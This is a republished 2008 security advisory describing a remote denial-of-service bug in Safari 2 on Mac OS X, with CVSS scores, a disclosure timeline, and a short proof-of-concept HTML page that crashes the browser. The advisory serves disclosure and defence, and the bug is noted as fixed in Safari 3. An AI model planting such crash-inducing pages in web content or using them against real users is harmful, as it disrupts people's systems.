Safari 2 Remote Denial of Service

2008.01.17
Credit: David Barroso
Risk: Medium
Local: Yes
Remote: Yes
CWE: CWE-20


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

############################################################## - S21Sec Advisory - ############################################################## Title: Safari 2 Denial of Service ID: S21SEC-039-en Severity: Medium - Remote DoS History: 15.Jul.2007 Vulnerability discovered 22.Jul.2007 Vendor contacted 27.Jul.2007 Vendor confirmed the vulnerability 26.Oct.2007 Safari 3 in Leopard 14.Nov.2007 Safari 3 in Tiger Scope: Remote Denial of Service Platforms: MacOSX Author: David Barroso (dbarroso (at) s21sec (dot) com [email concealed]) URL: http://www.s21sec.com/avisos/s21sec-039-en.txt Release: Public [ SUMMARY ] According to Wikipedia, Safari is a web browser developed by Apple Inc. and included in Mac OS X. It was first released as a public beta on January 7, 2003, as the default browser in Mac OS X v10.3. A beta version for Microsoft Windows was released for the first time on June 11, 2007 with support for Windows XP and Windows Vista [ AFFECTED VERSIONS ] Following versions are affected with this issue: - Safari Version 2 (MacOSX Version) [ DESCRIPTION ] A crafted HTML page can make Safari crash when trying to parse the page due to an unproper validation in the KHTML Webkit. Example: <html> <head> <title>Safari Exploit</title> </head> <body> <form> <div id="foo" style="display:none;"> <table> <tr> <td></td> </tr> </table> </div> <input type="text" /> </form> </body> </html> [ WORKAROUND ] The vulnerability was patched in Safari 3, officially released on October, 2007 (Leopard) and November, 2007 (Tiger). [ ACKNOWLEDGMENTS ] This vulnerability have been found and researched by: - David Barroso <dbarroso (at) s21sec (dot) com [email concealed]> S21sec labs [ REFERENCES ] * Wikipedia. Safari http://en.wikipedia.org/wiki/Safari_%28web_browser%29 * Safari http://www.apple.com/safari/ * S21Sec http://www.s21sec.com * Blog S21sec http://blog.s21sec.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top